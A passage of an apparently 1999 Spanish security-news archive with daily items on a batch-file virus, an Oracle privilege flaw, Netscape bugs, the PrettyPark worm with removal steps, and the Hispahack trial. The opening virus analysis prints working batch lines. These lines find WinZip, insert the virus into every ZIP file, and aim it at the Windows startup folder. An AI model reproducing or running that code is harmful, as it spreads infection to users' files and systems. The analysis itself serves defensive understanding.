ni información adicional que metería "basura" a la hora de procesar
los ficheros.
/l para que el listado se realice en minúsculas.

-----
@dir /s /b /l c:\winzip32.exe | set wz=
-----

A continuación, el virus recorre con un bucle el directorio, de manera
similar a la anterior línea, pero en busca de los ficheros con extensión
ZIP. Simultaneamente crea un archivo de proceso por lotes (winripem.bat)
donde añade (>>) una línea por cada fichero a infectar.

Esa línea hace referencia al archivo winzip32.exe cuya trayectoria
almacenó en la variable ("%wz%"). Gracias a él, podrá introducir el
archivo winrip.bat (que contiene el virus) de la carpeta de inicio
(startup), en cada uno de los ficheros ZIP que recorre. Los parámetros
utilizados en winzip32 son:
-min para realizar la compresión en modo rápido
-a que le indica que la acción es la de comprimir el fichero y añadirlo.
-r utiliza carpetas recursivas a la hora de buscar los ficheros.
-p guarda información extra de las carpetas, de nuevo se asegura que
cuando sea descomprimido se situará en la carpeta startup para
ejecutarse en cada inicio de sesión.

-----
@FOR /F "delims==" %%y IN ('dir /s /b /l c:\*.zip') DO @echo "%wz%" -min -a -r -p "%%y" "c:\..\..\..\..\..\..\..\winnt\profiles\default user\start menu\programs\startup\winrip.bat" >> winripem.bat
-----

Llama y ejecuta el fichero anteriormente creado, winripem.bat, lo que
provocará que se ejecuten todas y cada una de las líneas que creó,
y por tanto, infecte todos los ficheros ZIP, introduciendose en ellos.
Por último, borra este fichero.

-----
@call winripem.bat
@del winripem.bat
-----

El virus no realiza ninguna acción dañina directa, aunque con tan
sólo introducir una línea más en su código podría acarrear perdidas
importantes. Su capacidad de reproducción es bastante elevada, teniendo
en cuenta que se trata de un virus muy simple de proceso por lotes que
necesita la utilidad de compresión WINZIP32 para poder infectar.
Podemos catalogarlo dentro de los virus de bajo riesgo, y su interés
radica en su simpleza, que deja patente que los virus se nos pueden
presentar en multitud de formas y contenidos diferentes.


Bernardo Quintero



lunes, 7 de junio de 1999

Oracle publica un parche para cubrir una vulnerabilidad

El nuevo parche que lanza Oracle viene a cubrir un bug por el cual las
bases de datos bajo plataformas Unix quedaban vulnerables al ataque de
usuarios maliciosos.
La instalación de la opción denominada "intelligent Agent" de una base de
datos daba acceso a la aplicación oratclsh, en la cual se han encontrado
algunos defectos que posibilitan el ataque Oratclsh proporciona acceso
al lenguaje de scripts TCL y proporciona al usuario malicioso una vía
para lograr capacidades administrativas.

No es necesario haber iniciado el agente para abrir el agujero, basta
con su instalación para que este programa quede accesible, y pueda
brindar a un atacante permisos de administración con tan sólo tres
comandos. Esto es debido a que Oratclsh se ejecuta con los permisos
de administración, por lo que cualquier usuario no tendrá ninguna
limitación para llevar a cabo las acciones maliciosas.

Las versiones afectadas son Oracle8.03, 8.04, 8.05 y 8.1.5. En tales
casos es recomendable no instalar la opción "Intelligent Agent" y en
caso de tenerla instalada o bien proceder con el parche de Oracle o
borrar directamente la aplicación oratclsh o eliminar el bit de suid.

Más información:
Oracle
Bugtraq. Aviso vulnerabilidad
Bugtraq. Aviso Oracle, faq y parche



Antonio Ropero



domingo, 6 de junio de 1999

Nuevos bugs en Communicator

Georgi Gununski, el ya conocido cazador de bugs, anuncia dos nuevos
problemas en Communicator 4.6, la última versión del navegador de
Netscape.
Gununski lanza un nuevo aviso a toda la comunidad de usuarios de
Communicator, dos nuevo bugs existentes en las últimas versiones del
navegador posibilitan espiar o "escuchar" direcciones URL desde otra
ventana. Las versiones afectadas por el problema son Communicator 4.6
para Win95 y 4.07 para Linux, aunque es posible que otras versiones
también estén afectadas por el problema.

Los dos fallos son muy similares, y en ambos casos el problema reside
en la incorporación de código JavaScript dentro de la consola JavaScript.
En el primero de ellos, el ataque se realiza mediante el uso del
protocolo "data:", mientras que en el segundo se emplea el protocolo
"view-source:".

El acceso a los links del documento está prohibido en Netscape 4.6,
pero el documento se puede leer por medio de la función find(). La
única solución posible hasta que Netscape ofrezca un parche para el
problema es deshabilitar el uso de JavaScript en el Navegador.

Más información:
Demostración del bug
Georgi Guninski
Bugtraq
Bugtraq



Antonio Ropero



sábado, 5 de junio de 1999

Nuevo fallo en el Pentium III

Una incompatibilidad entre los dos nuevos productos estrella de
Intel, el chip gráfico 810 (sucesor del 740) y el procesador
Pentium III, provoca que al instalarlos juntos se cuelgue el
equipo.
El nuevo Bug, denominado MaskMovQ, se puede encontrar en las
instrucciones multimedia Streaming SIMD características de los
PIII. Según Intel este problema ya era conocido por la empresa,
pero las modificaciones realizadas en el micro no ofrecen resultado
positivo. Se puede encontrar una explicación al problema en el
diseño del chip gráfico, ya que se proyectó como un producto
barato para trabajar con los procesadores Celeron.

Paradójicamente, el nuevo chip gráfico 810 sí es compatible con
los procesadores de otros fabricantes de micros como AMD. Entre
las características más reseñables de este nuevo producto de Intel
destacan el soporte de audio y módem, además de alcanzar una
resolución gráfica de 1600x1200 con un refresco de 85 Hz, todo
ello acompañado de un potente motor gráfico 3D.

EL nuevo chip gráfico 810 verá la luz durante este mes de junio,
aunque para los Pentium III, Intel tiene previsto lanzar al mercado
próximamente el chip 820. Un producto de alto rendimiento provisto
de una interfaz de memoria de alta velocidad de Rambus Inc que
permitirá operar a una velocidad de 1,6 Gigabytes por segundo.
También para Pentium III, Intel prepara el chip 810E y el 840
destinado a estaciones de trabajo y servidores.

Más información:
Intel
PC World
Yahoo España
Noticias.com



Antonio Román



viernes, 4 de junio de 1999

PrettyPark, el posible sucesor de Happy99

PrettyPark es un nuevo gusano con características de troyano, que
en los últimos días está reproduciéndose rápidamente a través de
Internet. Por su forma de reproducción ya se apunta como candidato
a sucesor del conocido Happy99.
PrettyPark se reproduce a través del correo email, en forma de
fichero enlazado. Al igual que happy99.exe es capaz de autoenviarse
a través del correo electrónico con total desconocimiento del
usuario afectado. Sólo queda comprobar si PrettyPark alcanza
realmente la misma repercusión que Happy99, o se consigue parar
a tiempo la propagación de este elemento malicioso.

En esta ocasión PrettyPark se envía a las direcciones que forman
la libreta de direcciones del usuario infectado. El pro grama se
recibe como archivo adjunto en un correo con el asunto
C:\CoolProgs\Pretty Park.exe y sin ningún texto en el mensaje.

PrettyPark es un PE (Portable executable) de Windows programado en
Delphi. Cuando llega enlazado en un mensaje tiene un tamaño de 37
Kbytes, aunque se encuentra comprimido con la utilidad WWPack32,
por lo que su tamaño real es de 58 Kbytes. Cuando se instala en el
sistema, el virus se copia en el directorio system de Windows bajo
el nombre files32.vxd, inscribiéndose en el registro para ser
ejecutado cada vez que se inicie otra aplicación. Para ello
modifica la clave del registro
HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\ open\command
de su valor original "%1" %* a files32.vxd "%1" %*. El archivo
files32.vxd aunque tenga la extensión vxd, no es un controlador
VxD sino que se trata de un ejecutable real.

Además de enviarse así mismo por email, el virus trata de conectarse
cada 30 segundos a un servidor irc, de una lista de trece disponibles,
para enviar notificaciones de los sistemas infectados. De esta forma,
el autor del virus puede controlar los ordenadores afectados.

Una vez reconocido por el autor del virus, PrettyPark puede pasar a
convertirse en un troyano para enviarle a este toda la configuración
del sistema, logins y passwords de las conexiones a Internet,
información confidencial, así como todas las acciones típicas de
este tipo de programas malignos, como creación y eliminación de
archivos y directorios, ejecución de programas, etc.

Se puede eliminar manualmente y de forma sencilla este gusano
troyano de cualquier ordenador infectado. Basta con seguir los
siguientes pasos:

1- Borrar el archivo windows\system\files32.vxd
2- Borrar el archivo Pretty Park.exe
3- Ejecutar Regedit y modificar la entrada del registro:
HKEY_LOCAL_MACHINE\Software\Classes\exefile\shell\ open\command
de FILES32.VXD "%1" %* a "%1" %*
Esto puede hacerse fácilmente mediante una búsqueda de files32.vxd
en el registro y tras ello, eliminar el nombre del archivo
manteniendo el comando de ejecución original.
4- Reiniciar el ordenador.

Más información:
AVP
Symantec


Antonio Ropero



jueves, 3 de junio de 1999

Absuelto el principal acusado del "Caso Hispahack"

"No apareciendo, por tanto, que fuese el acusado quién alteró
los programas contenidos en el sistema informático de dicha
Universidad, no cabe llegar a otro pronunciamiento que el de
su libre absolución". Así termina la sentencia del juez Juan
Carlos Llavona Calderón y un capítulo de la historia del
"hacking" español, que llevó al banquillo, el pasado 26 de
marzo, al principal inculpado, alias JFS, 22 años, administrador
de sistemas informáticos y miembro del grupo !Hispahack (!H).
El llamado "Caso Hispahack" estalló a primeros de abril de 1998,
cuando el grupo de Delitos Informáticos de la Guardia Civil
detuvo, acusadas de revelación de secretos y daños informáticos,
a cuatro personas apodadas STK, Magne, JFS y JR. Finalmente,
la presión judicial se concretó en JFS, para quien el fiscal
pedía una pena de dos años de prisión y multa de dieciocho
meses, por "un acceso no autorizado a través de Internet" a
ordenadores de la Universitat Politècnica de Catalunya (UPC),
el 11 de septiembre de 1997. Se descubrió que el intruso tenía
privilegios de administrador en dieciseis máquinas, cinco de
las cuales tenían instalado un programa sabueso para cazar
datos que, aquel 11 de septiembre, el visitante recogió y
transfirió a un ordenador de Palma de Mallorca.

Aunque el juez considera estos hechos como probados y, por
tanto, no da validez a las reclamaciones del abogado de la
defensa, Carlos Sánchez Almeida, sobre nulidad de las pruebas,
inexistencia de delito o descriminalización de Internet, sí
admite que "tales sospechas no alcanzan la categoría de indicios
bastantes como para desvirtuar totalmente la presunción de
inocencia" de JFS. Según la sentencia, no queda probada la
identidad del misterioso intruso, se pierde su rastro y, en el
ordenador de Mallorca, dice el juez "el acceso se hallaba al
alcance de cualquiera que lo hiciese a través del usuario
"Hispahack"". Igualmente, recuerda que, según los péritos, "no
se hallaba ningún fichero de password (sic) de la UPC" en los
ordenadores de JFS.

A pesar del alivio del abogado defensor, quien asegura "el caso
!Hispahack ha sido la piedra de toque de la libertad de expresión
en Internet en este país. Afortunadamente para el sistema de
libertades, el sistema judicial funciona"; la sentencia se
muestra firme en algunos puntos que interesarán a la comunidad
informática, como la no necesidad de una denuncia previa a la
investigación en casos de daños, la afirmación del derecho de
las fuerzas de seguridad a obtener datos sobre usuarios de
proveedores de acceso sin autorización judicial o la respuesta
del juez a las insinuaciones de la defensa de que el "hack
blanco" no debería estar penado: "(Son) conductas que, en
cuanto suponen de agresión contra el interés del titular de
un determinado sistema de que la información que en él se
contiene no sea interceptada, resultan tanto más reprobables,
y aún merecedoras de sanción penal".

Más información:
Hispahack
Bufet Almeida (abogado de la defensa)


Mercè Molist



miércoles, 2 de junio de 1999

La seguridad también debe preocupar al usuario final

Los administradores de red preocupados por la seguridad de sus sistemas
deben estar continuamente informados de las nuevas versiones de los
productos instalados en sus máquinas. Pero no sólo los profesionales
deben preocuparse de estos detalles, los usuarios finales también se
pueden ver afectados por múltiples problemas si no actualizan su
software.
De un día para otro puede encontrarse un fallo de seguridad que
convierta a una gran mayoría de los servidores web en máquinas
fácilmente accesibles. Diariamente surgen nuevos agujeros, en HispaSec
cada día sorprendemos a nuestros suscriptores con un nuevo problema.
Muchos pueden pensar que el problema de la seguridad sólo atañe a los
administradores, informáticos y profesionales del sector, nada más
lejos de la realidad, el usuario final también debe preocuparse por
la integridad de su sistema doméstico.

Desde el clásico antivirus, perfectamente actualizado, hasta el propio
navegador son programas imprescindibles dentro del PC y que deben
actualizarse con regularidad. Un nuevo problema viene a confirmar este
hecho, los navegadores antiguos tienen la fecha de caducidad de los
certificados digitales a finales de este año. Tanto las versiones de
Netscape 4.05 y anteriores como la 4.x de Explorer se ven afectadas
por este hecho. Esto representa un grave problema a la hora de
establecer una comunicación con un sitio de comercio electrónico para
realizar una transacción.

Guninski y Cuartango descubren continuamente nuevos fallos de seguridad
que ponen los datos del disco duro accesibles a través del navegador.
Una configuración incorrecta del sistema operativo puede dejar abierto
el sistema a cualquier intruso. Un virus puede inutilizar todo nuestro
ordenador o un troyano puede desvelar todas nuestras cuentas de acceso
a Internet. Por todo ello, la seguridad también afecta a los usuarios
domésticos.


Antonio Ropero